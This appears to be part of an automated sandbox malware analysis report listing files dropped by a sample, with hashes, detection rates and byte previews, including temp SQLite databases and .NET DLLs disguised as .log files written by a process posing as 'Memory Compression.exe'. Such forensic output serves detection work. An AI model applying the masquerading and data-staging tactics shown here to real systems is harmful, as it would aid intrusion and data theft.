                                                                                                                                Size (bytes):196608
                                                                                                                                Entropy (8bit):1.121297215059106
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
                                                                                                                                MD5:D87270D0039ED3A5A72E7082EA71E305
                                                                                                                                SHA1:0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
                                                                                                                                SHA-256:F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
                                                                                                                                SHA-512:18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
                                                                                                                                Malicious:false
                                                                                                                                Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                C:\Users\user\AppData\Local\Temp\wdVnR3WgKr

                                                                                                                                Download File
                                                                                                                                Process:C:\Program Files (x86)\Windows Mail\Memory Compression.exe
                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):106496
                                                                                                                                Entropy (8bit):1.136413900497188
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cV/04:MnlyfnGtxnfVuSVumEHV84
                                                                                                                                MD5:429F49156428FD53EB06FC82088FD324
                                                                                                                                SHA1:560E48154B4611838CD4E9DF4C14D0F9840F06AF
                                                                                                                                SHA-256:9899B501723B97F6943D8FE6ABF06F7FE013B10A17F566BF8EFBF8DCB5C8BFAF
                                                                                                                                SHA-512:1D76E844749C4B9566B542ACC49ED07FA844E2AD918393D56C011D430A3676FA5B15B311385F5DA9DD24443ABF06277908618A75664E878F369F68BEBE4CE52F
                                                                                                                                Malicious:false
                                                                                                                                Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                C:\Users\user\AppData\Local\Temp\x5gHItlIe4

                                                                                                                                Download File
                                                                                                                                Process:C:\Program Files (x86)\Windows Mail\Memory Compression.exe
                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):106496
                                                                                                                                Entropy (8bit):1.136413900497188
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cV/04:MnlyfnGtxnfVuSVumEHV84
                                                                                                                                MD5:429F49156428FD53EB06FC82088FD324
                                                                                                                                SHA1:560E48154B4611838CD4E9DF4C14D0F9840F06AF
                                                                                                                                SHA-256:9899B501723B97F6943D8FE6ABF06F7FE013B10A17F566BF8EFBF8DCB5C8BFAF
                                                                                                                                SHA-512:1D76E844749C4B9566B542ACC49ED07FA844E2AD918393D56C011D430A3676FA5B15B311385F5DA9DD24443ABF06277908618A75664E878F369F68BEBE4CE52F
                                                                                                                                Malicious:false
                                                                                                                                Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                C:\Users\user\AppData\Local\Temp\xO1oZaW1uV

                                                                                                                                Download File
                                                                                                                                Process:C:\Program Files (x86)\Windows Mail\Memory Compression.exe
                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):106496
                                                                                                                                Entropy (8bit):1.136413900497188
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cV/04:MnlyfnGtxnfVuSVumEHV84
                                                                                                                                MD5:429F49156428FD53EB06FC82088FD324
                                                                                                                                SHA1:560E48154B4611838CD4E9DF4C14D0F9840F06AF
                                                                                                                                SHA-256:9899B501723B97F6943D8FE6ABF06F7FE013B10A17F566BF8EFBF8DCB5C8BFAF
                                                                                                                                SHA-512:1D76E844749C4B9566B542ACC49ED07FA844E2AD918393D56C011D430A3676FA5B15B311385F5DA9DD24443ABF06277908618A75664E878F369F68BEBE4CE52F
                                                                                                                                Malicious:false
                                                                                                                                Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                C:\Users\user\AppData\Local\Temp\xT9mRTdNPm

                                                                                                                                Download File
                                                                                                                                Process:C:\Program Files (x86)\Windows Mail\Memory Compression.exe
                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):196608
                                                                                                                                Entropy (8bit):1.121297215059106
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
                                                                                                                                MD5:D87270D0039ED3A5A72E7082EA71E305
                                                                                                                                SHA1:0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
                                                                                                                                SHA-256:F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
                                                                                                                                SHA-512:18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
                                                                                                                                Malicious:false
                                                                                                                                Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                C:\Users\user\AppData\Local\Temp\xeLD03TB4N

                                                                                                                                Download File
                                                                                                                                Process:C:\Program Files (x86)\Windows Mail\Memory Compression.exe
                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):196608
                                                                                                                                Entropy (8bit):1.121297215059106
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
                                                                                                                                MD5:D87270D0039ED3A5A72E7082EA71E305
                                                                                                                                SHA1:0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
                                                                                                                                SHA-256:F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
                                                                                                                                SHA-512:18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
                                                                                                                                Malicious:false
                                                                                                                                Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                C:\Users\user\AppData\Local\Temp\yS39zXaXXy

                                                                                                                                Download File
                                                                                                                                Process:C:\Program Files (x86)\Windows Mail\Memory Compression.exe
                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):106496
                                                                                                                                Entropy (8bit):1.136413900497188
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cV/04:MnlyfnGtxnfVuSVumEHV84
                                                                                                                                MD5:429F49156428FD53EB06FC82088FD324
                                                                                                                                SHA1:560E48154B4611838CD4E9DF4C14D0F9840F06AF
                                                                                                                                SHA-256:9899B501723B97F6943D8FE6ABF06F7FE013B10A17F566BF8EFBF8DCB5C8BFAF
                                                                                                                                SHA-512:1D76E844749C4B9566B542ACC49ED07FA844E2AD918393D56C011D430A3676FA5B15B311385F5DA9DD24443ABF06277908618A75664E878F369F68BEBE4CE52F
                                                                                                                                Malicious:false
                                                                                                                                Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                C:\Users\user\AppData\Local\Temp\ySOQaXCddz

                                                                                                                                Download File
                                                                                                                                Process:C:\Program Files (x86)\Windows Mail\Memory Compression.exe
                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 4
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):20480
                                                                                                                                Entropy (8bit):0.8439810553697228
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:24:TLyAF1kwNbXYFpFNYcw+6UwcQVXH5fBO9p7n52GmCWGf+dyMDCFVE1:TeAFawNLopFgU10XJBOB2Gbf+ba+
                                                                                                                                MD5:9D46F142BBCF25D0D495FF1F3A7609D3
                                                                                                                                SHA1:629BD8CD800F9D5B078B5779654F7CBFA96D4D4E
                                                                                                                                SHA-256:C11B443A512184E82D670BA6F7886E98B03C27CC7A3CEB1D20AD23FCA1DE57DA
                                                                                                                                SHA-512:AC90306667AFD38F73F6017543BDBB0B359D79740FA266F587792A94FDD35B54CCE5F6D85D5F6CB7F4344BEDAD9194769ABB3864AAE7D94B4FD6748C31250AC2
                                                                                                                                Malicious:false
                                                                                                                                Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                C:\Users\user\AppData\Local\Temp\yfBDWtJ8qm

                                                                                                                                Download File
                                                                                                                                Process:C:\Program Files (x86)\Windows Mail\Memory Compression.exe
                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):196608
                                                                                                                                Entropy (8bit):1.121297215059106
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
                                                                                                                                MD5:D87270D0039ED3A5A72E7082EA71E305
                                                                                                                                SHA1:0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
                                                                                                                                SHA-256:F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
                                                                                                                                SHA-512:18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
                                                                                                                                Malicious:false
                                                                                                                                Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                C:\Users\user\AppData\Local\Temp\yfTJcYDXjY

                                                                                                                                Download File
                                                                                                                                Process:C:\Program Files (x86)\Windows Mail\Memory Compression.exe
                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):106496
                                                                                                                                Entropy (8bit):1.136413900497188
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cV/04:MnlyfnGtxnfVuSVumEHV84
                                                                                                                                MD5:429F49156428FD53EB06FC82088FD324
                                                                                                                                SHA1:560E48154B4611838CD4E9DF4C14D0F9840F06AF
                                                                                                                                SHA-256:9899B501723B97F6943D8FE6ABF06F7FE013B10A17F566BF8EFBF8DCB5C8BFAF
                                                                                                                                SHA-512:1D76E844749C4B9566B542ACC49ED07FA844E2AD918393D56C011D430A3676FA5B15B311385F5DA9DD24443ABF06277908618A75664E878F369F68BEBE4CE52F
                                                                                                                                Malicious:false
                                                                                                                                Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                C:\Users\user\AppData\Local\Temp\z22raHJSfC

                                                                                                                                Download File
                                                                                                                                Process:C:\Program Files (x86)\Windows Mail\Memory Compression.exe
                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):20480
                                                                                                                                Entropy (8bit):0.5712781801655107
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                                                                MD5:05A60B4620923FD5D53B9204391452AF
                                                                                                                                SHA1:DC12F90925033F25C70A720E01D5F8666D0B46E4
                                                                                                                                SHA-256:6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
                                                                                                                                SHA-512:068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
                                                                                                                                Malicious:false
                                                                                                                                Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                C:\Users\user\AppData\Local\Temp\zsbChgzxI1

                                                                                                                                Download File
                                                                                                                                Process:C:\Program Files (x86)\Windows Mail\Memory Compression.exe
                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):196608
                                                                                                                                Entropy (8bit):1.121297215059106
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
                                                                                                                                MD5:D87270D0039ED3A5A72E7082EA71E305
                                                                                                                                SHA1:0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
                                                                                                                                SHA-256:F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
                                                                                                                                SHA-512:18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
                                                                                                                                Malicious:false
                                                                                                                                Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                C:\Users\user\Desktop\5474dbe429596f

                                                                                                                                Download File
                                                                                                                                Process:C:\Users\user\Desktop\Udzp7lL5ns.exe
                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):132
                                                                                                                                Entropy (8bit):5.537521987101441
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:3:4D8WIt4L4+PSAvH2NzLdVPS7ndoyOD9x0uiXdS6MHn:4D8WhUCrHebSBHuiNSHn
                                                                                                                                MD5:935F0FB590780CEB2166A0DF679C2309
                                                                                                                                SHA1:83CFCB4C1F7263BE5FA84F19BA1B9ABB9E93FA89
                                                                                                                                SHA-256:D140C32D7C054F51DA6AE8C5D5E3AF440427DEEFA5F2AA09751A55DE89395952
                                                                                                                                SHA-512:442B5B749166CD6E16EAA03EAD712AFF55F7172D07573BCCDFA924D5162C7FB7CFED5E669032E3D1C513ECC3A729DC938B406AB4E1F55B24A2473A6FE1874E8E
                                                                                                                                Malicious:false
                                                                                                                                Preview:9lr6YuXfPDxaSERZDxJvXb4dqDnL3RtDkdJ2mXRZwkCjYyj087PuE1uhqNQVGMm8Ut0y4Yxpft8wZVE1dxM5B89tsmMYH6Tk8DPp7u5kKjPU28IVJY1S9r6VuHFSMZiiaYyV

                                                                                                                                C:\Users\user\Desktop\BQKoNvFu.log

                                                                                                                                Download File
                                                                                                                                Process:C:\Program Files (x86)\Windows Mail\Memory Compression.exe
                                                                                                                                File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):85504
                                                                                                                                Entropy (8bit):5.8769270258874755
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:1536:p7Oc/sAwP1Q1wUww6vtZNthMx4SJ2ZgjlrL7BzZZmKYT:lOc/sAwP1Q1wUwhHBMx4a2iJjBzZZm9
                                                                                                                                MD5:E9CE850DB4350471A62CC24ACB83E859
                                                                                                                                SHA1:55CDF06C2CE88BBD94ACDE82F3FEA0D368E7DDC6
                                                                                                                                SHA-256:7C95D3B38114E7E4126CB63AADAF80085ED5461AB0868D2365DD6A18C946EA3A
                                                                                                                                SHA-512:9F4CBCE086D8A32FDCAEF333C4AE522074E3DF360354822AA537A434EB43FF7D79B5AF91E12FB62D57974B9ED5B4D201DDE2C22848070D920C9B7F5AE909E2CA
                                                                                                                                Malicious:true
                                                                                                                                Antivirus:
                                                                                                                                • Antivirus: Avira, Detection: 100%
                                                                                                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                • Antivirus: ReversingLabs, Detection: 71%
                                                                                                                                Joe Sandbox View:
                                                                                                                                • Filename: loader.exe, Detection: malicious, Browse
                                                                                                                                • Filename: 7aHY4r6vXR.exe, Detection: malicious, Browse
                                                                                                                                • Filename: 0V2JsCrGUB.exe, Detection: malicious, Browse
                                                                                                                                • Filename: PlZA6b48MW.exe, Detection: malicious, Browse
                                                                                                                                • Filename: wxl1r0lntg.exe, Detection: malicious, Browse
                                                                                                                                • Filename: HaLCYOFjMN.exe, Detection: malicious, Browse
                                                                                                                                • Filename: Z90Z9bYzPa.exe, Detection: malicious, Browse
                                                                                                                                • Filename: 0J5DzstGPi.exe, Detection: malicious, Browse
                                                                                                                                • Filename: 6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.exe, Detection: malicious, Browse
                                                                                                                                • Filename: HMhdtzxEHf.exe, Detection: malicious, Browse
                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." .....F...........e... ........@.. ...............................@....@..................................e..S.................................................................................... ............... ..H............text....E... ...F.................. ..`.rsrc................H..............@..@.reloc...............L..............@..B.................e......H.......p...(j..................................................................................c|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k

                                                                                                                                C:\Users\user\Desktop\DHvXeCGn.log

                                                                                                                                Download File
                                                                                                                                Process:C:\Users\user\Desktop\Udzp7lL5ns.exe
                                                                                                                                File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):23552
                                                                                                                                Entropy (8bit):5.519109060441589
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:384:RlLUkmZJzLSTbmzQ0VeUfYtjdrrE2VMRSKOpRP07PUbTr4e16AKrl+7T:RlYZnV7YtjhrfMcKOpjb/9odg7T
                                                                                                                                MD5:0B2AFABFAF0DD55AD21AC76FBF03B8A0
                                                                                                                                SHA1:6BB6ED679B8BEDD26FDEB799849FB021F92E2E09
                                                                                                                                SHA-256:DD4560987BD87EF3E6E8FAE220BA22AA08812E9743352523C846553BD99E4254
                                                                                                                                SHA-512:D5125AD4A28CFA2E1F2C1D2A7ABF74C851A5FB5ECB9E27ECECAF1473F10254C7F3B0EEDA39337BD9D1BEFE0596E27C9195AD26EDF34538972A312179D211BDDA
                                                                                                                                Malicious:true
                                                                                                                                Antivirus:
                                                                                                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                • Antivirus: ReversingLabs, Detection: 8%
                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....T...........s... ........@.. ..............................vX....@.................................Xs..S.................................................................................... ............... ..H............text....S... ...T.................. ..`.rsrc................V..............@..@.reloc...............Z..............@..B.................s......H.......PO...$...........N......................................................................................................................................................................6...GN..n.....................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                                                                                C:\Users\user\Desktop\EnQNlhbf.log

                                                                                                                                Download File
                                                                                                                                Process:C:\Users\user\Desktop\Udzp7lL5ns.exe
                                                                                                                                File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):85504
                                                                                                                                Entropy (8bit):5.8769270258874755
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:1536:p7Oc/sAwP1Q1wUww6vtZNthMx4SJ2ZgjlrL7BzZZmKYT:lOc/sAwP1Q1wUwhHBMx4a2iJjBzZZm9
                                                                                                                                MD5:E9CE850DB4350471A62CC24ACB83E859
                                                                                                                                SHA1:55CDF06C2CE88BBD94ACDE82F3FEA0D368E7DDC6
                                                                                                                                SHA-256:7C95D3B38114E7E4126CB63AADAF80085ED5461AB0868D2365DD6A18C946EA3A
                                                                                                                                SHA-512:9F4CBCE086D8A32FDCAEF333C4AE522074E3DF360354822AA537A434EB43FF7D79B5AF91E12FB62D57974B9ED5B4D201DDE2C22848070D920C9B7F5AE909E2CA
                                                                                                                                Malicious:true
                                                                                                                                Antivirus:
                                                                                                                                • Antivirus: Avira, Detection: 100%
                                                                                                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                • Antivirus: ReversingLabs, Detection: 71%
                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." .....F...........e... ........@.. ...............................@....@..................................e..S.................................................................................... ............... ..H............text....E... ...F.................. ..`.rsrc................H..............@..@.reloc...............L..............@..B.................e......H.......p...(j..................................................................................c|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k

                                                                                                                                C:\Users\user\Desktop\HJnNqbKj.log

                                                                                                                                Download File
                                                                                                                                Process:C:\Program Files (x86)\Windows Mail\Memory Compression.exe
                                                                                                                                File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):23552
                                                                                                                                Entropy (8bit):5.519109060441589
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:384:RlLUkmZJzLSTbmzQ0VeUfYtjdrrE2VMRSKOpRP07PUbTr4e16AKrl+7T:RlYZnV7YtjhrfMcKOpjb/9odg7T
                                                                                                                                MD5:0B2AFABFAF0DD55AD21AC76FBF03B8A0
                                                                                                                                SHA1:6BB6ED679B8BEDD26FDEB799849FB021F92E2E09
                                                                                                                                SHA-256:DD4560987BD87EF3E6E8FAE220BA22AA08812E9743352523C846553BD99E4254
                                                                                                                                SHA-512:D5125AD4A28CFA2E1F2C1D2A7ABF74C851A5FB5ECB9E27ECECAF1473F10254C7F3B0EEDA39337BD9D1BEFE0596E27C9195AD26EDF34538972A312179D211BDDA
                                                                                                                                Malicious:true
                                                                                                                                Antivirus:
                                                                                                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                • Antivirus: ReversingLabs, Detection: 8%
                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....T...........s... ........@.. ..............................vX....@.................................Xs..S.................................................................................... ............... ..H............text....S... ...T.................. ..`.rsrc................V..............@..@.reloc...............Z..............@..B.................s......H.......PO...$...........N......................................................................................................................................................................6...GN..n.....................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                                                                                C:\Users\user\Desktop\MvRfNUhf.log

                                                                                                                                Download File
                                                                                                                                Process:C:\Program Files (x86)\Windows Mail\Memory Compression.exe
                                                                                                                                File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):32256
                                                                                                                                Entropy (8bit):5.631194486392901
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:384:lP/qZmINM9WPs9Q617EsO2m2g7udB2HEsrW+a4yiym4I16Gl:lP/imaPyQ4T5dsHSt9nQ
                                                                                                                                MD5:D8BF2A0481C0A17A634D066A711C12E9
                                                                                                                                SHA1:7CC01A58831ED109F85B64FE4920278CEDF3E38D
                                                                                                                                SHA-256:2B93377EA087225820A9F8E4F331005A0C600D557242366F06E0C1EAE003D669
                                                                                                                                SHA-512:7FB4EB786528AD15DF044F16973ECA05F05F035491E9B1C350D6AA30926AAE438E98F37BE1BB80510310A91BC820BA3EDDAF7759D7D599BCDEBA0C9DF6302F60
                                                                                                                                Malicious:true
                                                                                                                                Antivirus:
                                                                                                                                • Antivirus: ReversingLabs, Detection: 25%
                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....v..........n.... ........@.. ....................................@.....................................O.................................................................................... ............... ..H............text...tt... ...v.................. ..`.rsrc................x..............@..@.reloc...............|..............@..B................P.......H........c...1..........._..h....................................................................................................................................................................Q.1k...].~g.v................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                                                                                C:\Users\user\Desktop\SxREamFR.log

                                                                                                                                Download File
                                                                                                                                Process:C:\Program Files (x86)\Windows Mail\Memory Compression.exe
                                                                                                                                File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):9728
                                                                                                                                Entropy (8bit):5.0168086460579095
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:96:b2+4Af/qPl98sgn8VenjzRR0xXzhZ7BiCTUk9v2G6/7jK6XsBG7hWuP9LfqpW0RQ:gCU8XKb7BDUieGi3jcBgLyB+b
                                                                                                                                MD5:69546E20149FE5633BCBA413DC3DC964
                                                                                                                                SHA1:29FEB42AB8B563FAFACFD27FAE48D4019A4CBCC2
                                                                                                                                SHA-256:B48CA16B9BA2B44BF13051705B8E12D587D80262F57F7B2595AD1DD7854A86C6
                                                                                                                                SHA-512:90D5F6C334B8064ED6DD002B03C57CEBBFAC1620D6CB2B79103DB0369D3A4FD82DB092E675F387AB0BDFE20303D9AC37F4E150896FC333E6F83B00269F012236
                                                                                                                                Malicious:true
                                                                                                                                Antivirus:
                                                                                                                                • Antivirus: ReversingLabs, Detection: 4%
                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......e...........!.................=... ...@....... ....................................@..................................<..W....@.......................`....................................................... ............... ..H............text...4.... ...................... ..`.rsrc........@....... ..............@..@.reloc.......`.......$..............@..B.................=......H.......<&.............................................................................................................*V...}................*.*.0..C.......(....o.......(....(....o.......(....s......(...........o....o.....*..0..'.......s.......(....o.....o........,..o......*..................0.............{........&.r...p.{....r;..p(....}.....s....}.....{........[.{.....{....o....(....s....rQ..po.....{.....{....o....(....s....ra..po......{....s....}.....{..........+.{.....{..

                                                                                                                                C:\Users\user\Desktop\XMmLkVMA.log

                                                                                                                                Download File
                                                                                                                                Process:C:\Users\user\Desktop\Udzp7lL5ns.exe
                                                                                                                                File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):32256
                                                                                                                                Entropy (8bit):5.631194486392901
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:384:lP/qZmINM9WPs9Q617EsO2m2g7udB2HEsrW+a4yiym4I16Gl:lP/imaPyQ4T5dsHSt9nQ
                                                                                                                                MD5:D8BF2A0481C0A17A634D066A711C12E9
                                                                                                                                SHA1:7CC01A58831ED109F85B64FE4920278CEDF3E38D
                                                                                                                                SHA-256:2B93377EA087225820A9F8E4F331005A0C600D557242366F06E0C1EAE003D669
                                                                                                                                SHA-512:7FB4EB786528AD15DF044F16973ECA05F05F035491E9B1C350D6AA30926AAE438E98F37BE1BB80510310A91BC820BA3EDDAF7759D7D599BCDEBA0C9DF6302F60
                                                                                                                                Malicious:true
                                                                                                                                Antivirus:
                                                                                                                                • Antivirus: ReversingLabs, Detection: 25%
